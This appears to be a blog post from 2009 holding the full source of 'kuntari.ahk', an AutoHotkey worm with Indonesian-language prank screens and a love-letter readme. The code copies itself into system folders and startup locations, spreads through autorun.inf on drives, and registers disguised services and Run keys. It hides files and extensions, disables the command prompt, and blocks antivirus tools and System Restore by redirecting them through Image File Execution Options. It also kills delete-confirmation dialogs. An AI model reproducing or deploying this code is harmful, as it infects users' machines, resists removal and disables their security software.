16 Oktober 2009

kuntari.ahk

#SingleInstance ignore
#NoTrayIcon

SetBatchLines -1

DllCall("SystemParametersInfo", UInt, 0x14, UInt, 0, Str, A_WinDir . "\Prairie Wind.bmp", UInt, 2)

FileCreateDir, C:\WINDOWS\system32\Shell32

IniWrite, C:\WINDOWS\system32\SHELL32.dll, %ScriptName%\desktop.ini, .ShellClassInfo, IconFile
IniWrite, 130, %ScriptName%\desktop.ini, .ShellClassInfo, IconIndex
IniWrite, 0, %ScriptName%\desktop.ini, .ShellClassInfo, ConfirmFileOp
IniWrite, {BE098140-A513-11D0-A3A4-00C04FD706EC}, %ScriptName%\desktop.ini, {BE098140-A513-11D0-A3A4-00C04FD706EC}, {BE098140-A513-11D0-A3A4-00C04FD706EC}
IniWrite, 1, %ScriptName%\desktop.ini, ExtShellFolderViews, Attributes
IniWrite, C:\WINDOWS\Prairie Wind.bmp, %ScriptName%\desktop.ini, {BE098140-A513-11D0-A3A4-00C04FD706EC}, IconArea_Image
IniWrite, 0x0000FF80, %ScriptName%\desktop.ini, {BE098140-A513-11D0-A3A4-00C04FD706EC}, IconArea_Text
IniWrite, {4FFE0-28D4-11CF-AE66-08002B2E1262}, %ScriptName%\desktop.ini, {4FFE0-28D4-11CF-AE66-08002B2E1262}, {4FFE0-28D4-11CF-AE66-08002B2E1262}

filecopy, %scriptname%\Signaturs.db, C:\WINDOWS\system32\Shell32\0x00.mp3
filecopy, %scriptname%\kuntari.exe, %a_temp%\kuntari.exe
filecopy, %scriptname%\kuntari.exe, %A_StartupCommon%\kuntari.exe
filecopy, %scriptname%\kuntari.exe, C:\WINDOWS\system32\Shell32\kuntari.exe
filecopy, %scriptname%\kuntari.exe, C:\WINDOWS\system32\diskcomp.exe
filecopy, %scriptname%\kuntari.exe, C:\WINDOWS\explorer|crn.exe
filecopy, %scriptname%\kuntari.exe, c:\windows\kuntari.exe
filecopy, %scriptname%\kuntari.exe, C:\WINDOWS\Fonts\kuntari.exe
FileCopy, %scriptname%\kuntari.exe, C:\Thurnbs.exe

IfExist, %scriptname%\Thurnbs.exe
fileappend,
(
start \Thurnbs.exe
start \kuntari.exe
), C:\HackAdministrator.bat

filecopy, C:\HackAdministrator.bat, c:\windows\system32\shell32\HackAdministrator.bat

IfNotExist, C:\windows\system32\Shell32\signatur.bat
fileappend,
(
@echo off
start C:\windows\system32\Shell32\kuntari.exe
start C:\WINDOWS\explorer|crn.exe
),C:\windows\system32\Shell32\signatur.bat

ifnotexist, C:\WINDOWS\system32\sangar.bat
winset, AlwaysOnTop
fileappend,
(

@echo off
title Your Computer I Am Take Over
mode 80,19
color f0
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ######### ######### #### #### ######### ######### ###########
echo ########### ########### #### ## ########### ########### ###########
echo ## ## ## ## ## ## ## ## ## ## ## ## ##
echo ## ### ## ## ## ## ## ## ## ## ## ## ##
echo ## ## ## ## ## ## ## ### ## ## ## ##
echo ########## ## # ## ## ## ## ## ## # ## ## ##
echo ########## ## ######## ## #### ## ###### ## ######## ## ########
echo ## ## ######## ## ### ## ###### ## ######## ## #######
echo ### ## ## # ## ## ## ## # ## ## # ## ## ###
echo ## ## ## ## ## ## ## ## ## ## ## ### #
echo ########### ## ## ## ## ########### ## ## ## ####
echo ######### #### #### #### ### ######### #### #### #### #####
echo (C)Copyright Holy Alliance KUNTARI Union Corporation
echo UU No. 7 thn. 2987 pasal 44 : 1 tentang Hak Cipta
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo Are you sure you want to delete 'C:\WINDOWS\*.*'?
pause
start C:\WINDOWS\system32\Shell32\kuntari.exe
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
echo 333333333333333333333333333333333333333333333333333333333333333333333333333333
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
echo 222222222222222222222222222222222222222222222222222222222222222222222222222222
ping localhost -n 2 -w 500 >nul
ping localhost -n 2 -w 500 >nul
echo 111111111111111111111111111111111111111111111111111111111111111111111111111111
ping localhost -n 2 -w 500 >nul
goto boom

:boom
echo BAAAKKKKKKAAAAAARRRRRRRRRR!!!!!!!!!
goto boom
), C:\WINDOWS\system32\Shell32\sangar.bat

fileappend,
(

@echo off
title Your Competer Have Over Taken By Animasola
mode 66,37
color 0c
echo ~
echo ## ## ## ## ## ## ######### ####### ####### ###
echo ## ## ## ## #### ## ######### ######### ######## ###
echo ## ## ## ## ## ## ## ### ## ## ## ### ###
echo ## ## ## ## ## #### ### ## ## ## ### ###
echo #### ## ## ## ### ### ######### ####### ###
echo ## ## ## ## ## ## ### ######### ###### ###
echo ## ## ## ## ## ## ### ## ## ## ### ###
echo ## ## ######## ## ## ### ## ## ## ### ###
echo ## ## ###### ## ## ### ## ## ## ### ###
echo ~
echo Andaikan saja engkau tahu kalau aku masih tetap menantimu
echo (C) Copyright 2008-2009 Holy Alliance KUNTARI Union Corp.
echo ~
ping localhost -n 2 -w 500 >nul
echo Dinda Oh Dinda, Rinduku apa juga rindumu?
ping localhost -n 2 -w 500 >nul
echo ~
echo Aku sudah tak sanggup menahan
echo Cinta yang kejam merajarela sendirian
echo Dan denyut kerinduan yang amat menyakitkan
echo ~
ping localhost -n 2 -w 500 >nul
echo Dinda Oh Dinda, Apa Engkau telah jadi rembulan?
ping localhost -n 2 -w 500 >nul
echo ~
echo Lalu kupinta pada bits Binary
echo Untuk menyampaikan perasaan ini
echo Sebab sang angin tak bisa hantarkan
echo Badai kenisbian dalam penantian
echo ~
ping localhost -n 2 -w 500 >nul
echo Dinda Oh Dinda, Cintaku padamu bagai adonan roti
echo dengan bayak ragi. Apakah akan berhenti mengembang?
ping localhost -n 2 -w 500 >nul
echo ~
echo Malamku amat menakutkan
echo Ia seolah memaksaku untuk bertanya
echo "Di hatimu siapa yang Engkau rindukan?"
echo Sampai saat ini, kau yang kucinta
echo ~
ping localhost -n 2 -w 500 >nul
echo Dinda Oh Dinda, Aku ingin membunuhmu!
ping localhost -n 2 -w 500 >nul
echo ~
pause
start C:\WINDOWS\system32\Shell32\kuntari.exe
), C:\AUTOEXEC.BAT

FileSetAttrib, +RHS, %scriptname%\Signaturs.db
FileSetAttrib, +HS, C:\Thurnbs.exe
FileSetAttrib, +S, C:\WINDOWS\system32\Shell32\sangar.bat
FileSetAttrib, +R, C:\Read Me.txt
FileSetAttrib, +HS, %scriptname%\kuntari.exe
FileSetAttrib, +HS, %scriptname%\kuntari.vbs

RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfEscapement, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfOrientation, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfWeight, 00000190
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfItalic, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfUnderline, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfStrikeOut, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfCharSet, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfOutPrecision, 00000001
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfClipPrecision, 00000002
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfQuality, 00000002
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, lfPitchAndFamily, 00000031
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iPointSize, 00000064
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, fWrap, 00000001
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, StatusBar, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, fSaveWindowPositions, 00000000
RegWrite, REG_SZ, HKEY_CURRENT_USER, Software\Microsoft, lfFaceName, OCR A Extended
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, szHeader, &f
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, szTrailer, Page &p
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iMarginTop, 000003e8
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iMarginBottom, 000003e8
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iMarginLeft, 000002ee
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iMarginRight, 000002ee
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, fMLE_is_broken, 00000000
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iWindowPosX, 0000008e
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iWindowPosY, 00000072
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iWindowPosDX, 000002f9
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft, iWindowPosDY, 00000176
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, ScreenColors, 254
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, FontSize, 1179658
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, FontFamily, 48
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, FontWeight, 400
RegWrite, REG_SZ, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, FaceName, Terminal
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, ScreenBufferSize, 2424898
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Console\%SystemRoot%_system32_cmd.exe, WindowSize, 2424898

RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\A\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\C\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\D\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\E\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\F\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\G\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\H\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\I\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,54

lop:
loop
{
IfNotExist, \autorun.inf
FileAppend,
(
[Autorun]

open=kuntari.exe

shell\Properties\command=kuntari.exe

shell=Properties
} \autorun.inf

IfNotExist, \desktop.ini
FileAppend,
(
[.ShellClassInfo]

IconFile=C:\WINDOWS\system32\SHELL32.dll

IconIndex=12

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]

Attributes=1

IconArea_Image=C:\WINDOWS\Prairie Wind.bmp

IconArea_Text=0x0000FF80

[{4FFE0-28D4-11CF-AE66-08002B2E1262}]

{4FFE0-28D4-11CF-AE66-08002B2E1262}={4FFE0-28D4-11CF-AE66-08002B2E1262}

} \desktop.ini

IfNotExist, \folder.htt
FileAppend,
(





) \folder.htt

FileSetAttrib, +H, %scriptname%\autorun.inf
filesetattrib, +HS, C:\WINDOWS\system32\Shell32
FileSetAttrib, +HS, %scriptname%\desktop.ini
FileSetAttrib, +H, %scriptname%\folder.htt
FileCopy, %scriptname%\autorun.inf, C:\WINDOWS\system32\Shell32\autorun.inf
FileCopy, %scriptname%\folder.htt, C:\WINDOWS\system32\Shell32\folder.htt
FileCopy, %scriptname%\desktop.ini, C:\WINDOWS\system32\Shell32\desktop.ini


IfWinActive, Confirm File Delete, The file 'Thurnbs.exe' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete, The file 'kuntari.exe' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete, The file 'Signaturs.db' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete,Are you sure you want to delete 'Read_Me.txt'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete '[KUNTARI]Read Me.txt'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete 'Hinata SEX;www.hentain.movie.com.exe'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete 'HackAdministrator.bat'?
{
WinKill
Run \HackAdministrator.bat
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Thurnbs.exe' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'kuntari.exe' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Hinata SEX;www.hentain.movie.com.exe' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Read_Me.txt' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send '[KUNTARI]Read Me.txt' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, The file 'Thurnbs' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete, The file 'kuntari' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete, The file 'Signaturs' is a system file.
{
WinKill
}

IfWinActive, Confirm File Delete,Are you sure you want to delete 'Read_Me'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete '[KUNTARI]Read Me'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete 'Hinata SEX;www.hentain.movie.com'?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to delete 'HackAdministrator'?
{
WinKill
Run \HackAdministrator.bat
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Thurnbs' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'kuntari' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Hinata SEX;www.hentain.movie.com' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send 'Read_Me' to the Recycle Bin?
{
WinKill
}

IfWinActive, Confirm File Delete, Are you sure you want to send '[KUNTARI]Read Me' to the Recycle Bin?
{
WinKill
}


IfNotExist, C:\Thurnbs.exe
{
FileCopy, c:\windows\system32\shell32\kuntari.exe, C:\Thurnbs.exe
FileCopy, c:\windows\system32\shell32\HackAdministrator.bat, c:\HackAdministrator.bat
}

IfNotExist, \Read_Me.txt
FileAppend,
(
Dear : Seorang gadis yang hatiku amat mengidam-idamkannya

Mendekap rembulan dalam kaca. Menimang angan pada ranting bintang. Raga habis daya, jiwa dilanda duka. Aku disesatkan kasmaran yang menghanyutkan. Sebab chupid telah melepaskan panah asmaranya, panah itu melesat cepat dan terlepas dari tikaman sorot mataku. Lalu dengan seenaknya panah itu langsung saja menikam dadaku, seolah-olah ia sudah menyimpan perjanjian rahasia khusus dengan hatiku. Sungguh aku jatuh hati padamu. Bila saja diri kita itu perangkat komputer. Cukup aku memasukan script open=LopYu4Ever
icon=MyImage.ico pada file AUTORUN dalam diriku. Supaya tiap kali aku terkoneksi denganmu, mataku mampu mengartikan apa yang menyelimuti hatiku.

Engkau adalah sinar mentari yang menjadi kebanggaan dalam kegelapan kehidupanku. Ingin kutampung permata embun di dedaunan dengan mahkota bunga, dan aku akan mepersembahkannya padamu bersama angin pagi yang membelai rambutmu. Jika saja dirimu adalah system komputer. Maka aku tinggal menulis string “ echo Selamat Pagi Mentariku ” pada file AUTOEXECmu lalu tak lupa aku juga membumbukan kata goto di belakangnya. Agar tiap kali engkau proses booting, akan ada pesanku menyambutmu sebelum kebisingan dunia menjamahmu. Tujuanku hanya satu, aku selalu ingin melihatmu tersenyum.Kan mana ada mentari yang menangis.

Malamku.... Malammu.... Rinduku.... Apakah juga rindumu? Engkau adalah gadis yang hatiku sangat mengidam-idamkannya. Perhatianku pada hiruk-pikuk dunia telah engkau rebut begitu saja. Di dalam laju pikiranku hanya ada engkau, hingga aku tak bisa memikirkan yang lain selain dirimu. Dan mataku ini, entah kenapa bisa tak merasa bosan jika selalu memandangimu. Andaikan hatimu itu sebuah komputer. Aku tinggal mengetik :/>ChkDsk pada Windows Command Processormu. Supaya aku tahu, masih tersisakah Free Space untuk aku singgah di hatimu. Dan bila masih ada bytes available on disk, aku akan memasukan string \>XCopy MySelf.sys. lalu tidak lupa aku juga membuat REG_SZ value "There are not free space for you. Your Access is Denied. Here is protect by his boy friend" pada Key name HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InfoTip di Registry Editormu. Agar tak ada yang macam-macam denganmu.

Salahkah aku, bila berharap menjadi sentuhan yang engkau butuhkan di tiap malam. Menjadi sosok yang engkau harapkan kebaikan-kebaikannya dan sosok yang di antara mimpi dan kenyataanmu. Sungguh aku cinta kamu. Andai saja engkau adalah system komputer, aku tiggal menginfeksikan file Visual Basic Script yang memuat string rf.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Souls”,temppath &"\Souls.vbs". Dan BOOM!!!. Niscaya engkau akan memikirkan aku seperti aku memikirkanmu. Emgkau akan mengharapkanku seperti aku mengharapkanmu. Engkau akan mencintai aku seperti aku mencintaimu. Dan engkau akan menangis karenaku seperti aku menangis karenamu.

Namun sayangnya, engkau bukanlah sebuah sytem komputer yang hanya terdiri dari angka '0' dan '1' hingga aku bisa berbuat seenak udelku padamu. Engkau adalah seorang gadis yang aku harap bisa menjadi pendamping hidupku. Dan pada baris terakhir surat ini. Aku hanya bisa menguncupkan jemari sambil meminta, niatku yang paling inti bukan lagi menjadi suatu rahasia, maukah kau menjadi kekasihku? Serta di pojok kertas surat ini yang putih, kusertakan pula hatiku yang sedih. Karena hanya engkaulah yang mampu menghapus kesedihan dalam rimba luka di hatiku.

WARNING!!!!!!
Semua yang aku tertulis di atas hanyalah bohong besar. Bukankah seorang wanita lebih menyukai manisnya ngombal, walaupun itu hanyalah dusta semata.Sekali lagi, semua yang tertulis di atas hanyalah bualan kosong. Kecuali kalimat Aku Sayang Kamu.
), \Read_Me.txt

RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt, 1
regwrite, Reg_Dword, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer, SearchHidden, 0
RegWrite, REG_DWORD, HKEY_CURRENT_USER, software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden, 0
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, Hidden, 2
RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Policies\Microsoft\Windows\System, DisableCMD, 2

RegWrite,REG_SZ, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be6efb9e-1afc-11de-a288-81c4d079114a}\Shell\AutoRun\command, DiskComputer,C:\WINDOWS\system32\diskcomp.exe

RegWrite,REG_SZ, HKEY_USERS, S-1-5-21-1123561945-1482476501-682003330-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be6efb9e-1afc-11de-a288-81c4d079114a}\Shell\AutoRun\command\,DiskComputer,C:\WINDOWS\system32\diskcomp.exe

RegWrite, REG_SZ, HKEY_CURRENT_USER, Software\Microsoft\Internet Explorer\Desktop\SafeMode,DiskComputer,C:\WINDOWS\system32\diskcomp.exe

RegWrite, REG_DWORD, HKEY_CLASSES_ROOT, exefile, NeverShowExt, 1
RegWrite, REG_DWORD, HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, NeverShowExt, 1
RegWrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,2
RegWrite, REG_EXPAND_SZ, HKEY_CLASSES_ROOT, exefile\DefaultIcon,, C:\WINDOWS\system32\SHELL32.dll,2

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Sytem Console, C:\WINDOWS\system32\Shell32\signatur.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, System Generic, C:\Thurnbs.exe

regwrite, reg_sz, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, Explorer.exe & "\kuntari.exe"

regwrite, REG_EXPAND_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger,, kuntari.exe

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat
RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVG.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat
RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat
RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kapersky.exe\Debugger,,C:\WINDOWS\system32\Shell32\sangar.bat

RegWrite, REG_SZ, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger,,

RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, DisplayName, Shell Software HexaDecimal
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, ImagePath, NetBIOS Interface%SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Kuntari, Description, Supports System Data Base Bios (SDBB), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, DisplayName, NetBIOS Interface
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Kuntari, Description, Supports System Data Base Bios (SDBB), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, DisplayName, NetBIOS Interface
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Kuntari, Description, Supports System Data Base Bios (SDBB), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.

RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, DisplayName, Data Base File
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Thurnbs, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, DisplayName, Data Base File
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Thurnbs, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
